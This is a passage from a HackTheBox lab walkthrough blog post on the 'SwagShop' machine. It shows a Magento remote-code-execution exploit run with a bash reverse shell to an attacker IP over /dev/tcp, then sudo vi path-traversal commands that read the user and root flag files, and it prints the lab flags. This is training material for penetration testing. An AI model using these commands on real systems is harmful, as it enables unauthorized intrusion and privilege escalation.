</pre></table></code></div></div><p>Finally the exploit worked:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/success.png" alt="exploit worked" /></p><h2 id="reverse-shell-www-data">Reverse shell (<code class="language-plaintext highlighter-rouge">www-data</code>)</h2><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span>python 37811.py http://10.10.10.140/index.php/admin/ <span class="s2">"bash -c 'bash -i &gt;&amp;/dev/tcp/10.10.14.7/4444 0&gt;&amp;1'"</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/sh.png" alt="sh" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/reverse-shell.png" alt="reverse-shell" /></p><p>Now that we have an acces to the machine’s shell, let’s do enumeration with <strong>linpeas.sh</strong>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/linpeas.png" alt="sudo -l" /></p><p>Thanks to this misconfiguration with the wildcard we can read both user and root flags, using <code class="language-plaintext highlighter-rouge">vi</code> as follows:</p><h2 id="user-haris">User (<code class="language-plaintext highlighter-rouge">haris</code>)</h2><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">sudo</span> /usr/bin/vi /var/www/html/../../../home/haris/user.txt
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/haris.png" alt="harris" /></p><ul><li>flag: <code class="language-plaintext highlighter-rouge">a448877277e82f05e5ddf9f90aefbac8</code></li></ul><h2 id="root">Root</h2><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">sudo</span> /usr/bin/vi /var/www/html/../../../root/root.txt
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/root.png" alt="root" /></p><ul><li>flag: <code class="language-plaintext highlighter-rouge">c2b087d66e14a652a3b86a130ac56721</code> ___</li></ul><h2 id="useful-links">Useful links</h2><ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2015-1397">CVE-2015-1397</a></li><li><a href="https://www.exploit-db.com/exploits/37977">Magento eCommerce - Remote Code Execution</a></li><li><a href="https://www.exploit-db.com/exploits/37811">Magento CE &lt; 1.9.0.1 - (Authenticated) Remote Code Execution </a></li></ul></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox-walkthroughs/'>Hackthebox walkthroughs</a>, <a href='/categories/linux/'>Linux</a>, <a href='/categories/easy/'>Easy</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/htb-linux-easy/" class="post-tag no-text-decoration" >htb-linux-easy</a> <a href="/tags/magento/" class="post-tag no-text-decoration" >Magento</a> <a href="/tags/e-commerce/" class="post-tag no-text-decoration" >e-commerce</a> <a href="/tags/sqli/" class="post-tag no-text-decoration" >SQLi</a> <a href="/tags/chaining-exploits/" class="post-tag no-text-decoration" >chaining exploits</a> <a href="/tags/fixing-exploit/" class="post-tag no-text-decoration" >fixing exploit</a> <a href="/tags/linpeas/" class="post-tag no-text-decoration" >linpeas</a> <a href="/tags/sudo-misconfiguration/" class="post-tag no-text-decoration" >sudo misconfiguration</a> <a href="/tags/vi/" class="post-tag no-text-decoration" >vi</a> <a href="/tags/writeup/" class="post-tag no-text-decoration" >writeup</a> <a href="/tags/oscp-prep/" class="post-tag no-text-decoration" >oscp-prep</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HackTheBox - SwagShop - amirr0r&url=https://amirr0r.github.io/posts/htb-swagshop/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox - SwagShop - amirr0r&u=https://amirr0r.github.io/posts/htb-swagshop/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=HackTheBox - SwagShop - amirr0r&url=https://amirr0r.github.io/posts/htb-swagshop/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/crto-review/">CRTO Review (Certified Red Team Operator) & Notion Templates</a></li><li><a href="/posts/htb-forest/">HackTheBox - Forest</a></li><li><a href="/posts/oscp-review/">OSCP Review (Cheat Sheet, Tmux Enumeration Scripts and Notion Templates)</a></li><li><a href="/posts/oscp-prep/">How do I prepare for the OSCP?</a></li><li><a href="/posts/htb-valentine/">HackTheBox - Valentine</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/msfvenom/">msfvenom</a> <a class="post-tag" href="/tags/sudo-misconfiguration/">sudo misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">password cracking</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/meterpreter/">meterpreter</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/gtfobins/">GTFOBins</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/john-the-ripper/">John The Ripper</a> <a class="post-tag" href="/tags/powershell/">powershell</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/htb-openadmin/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Jan 1, 2021 <i class="unloaded">2021-01-01T23:21:04+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - OpenAdmin</h3><div class="text-muted small"><p> Foothold nmap scan 1 2 3 4 5 6 7 8 9 10 11 $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN OpenAdmin-full-port-scan.txt 10.10.10.171 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSS...</p></div></div></a></div><div class="card"> <a href="/posts/htb-blunder/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Jan 20, 2021 <i class="unloaded">2021-01-20T17:37:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Blunder</h3><div class="text-muted small"><p> Enumeration nmap scan 1 2 3 4 5 6 7 $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Blunder-full-port-scan.txt 10.10.10.191 PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open htt...</p></div></div></a></div><div class="card"> <a href="/posts/htb-blocky/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Dec 22, 2020 <i class="unloaded">2020-12-22T00:17:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Blocky</h3><div class="text-muted small"><p> Foothold Nmap scan (open ports) $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Blocky-full-port-scan.txt 10.10.10.37 Nmap scan report for 10.10.10.37 Host is up (0.12s latency). Not shown:...</p></div></div></a></div></div></div><!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/htb-valentine/" class="btn btn-outline-primary"><p>HackTheBox - Valentine</p></a> <a href="/posts/htb-bashed/" class="btn btn-outline-primary"><p>HackTheBox - Bashed</p></a></div><!-- The Disqus lazy loading. Powered by: https://osvaldas.info/lazy-loading-disqus-comments v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT License --><div id="disqus" class="pt-2 pb-2"><p class="font-italic text-center text-muted small"> Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script src="/assets/js/lib/jquery.disqusloader.min.js"></script> <script> var options = { scriptUrl: '//amirr0r-github-io.disqus.com/embed.js', disqusConfig: function() { this.page.url = 'https://amirr0r.github.io/posts/htb-swagshop/'; this.page.identifier = '/posts/htb-swagshop/'; } }; $.disqusLoader('#disqus', options); </script></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://github.com/amirr0r">amirr0r</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/msfvenom/">msfvenom</a> <a class="post-tag" href="/tags/sudo-misconfiguration/">sudo misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">password cracking</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/meterpreter/">meterpreter</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/gtfobins/">GTFOBins</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/john-the-ripper/">John The Ripper</a> <a class="post-tag" href="/tags/powershell/">powershell</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', '', 'auto'); ga('send', 'pageview'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://amirr0r.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
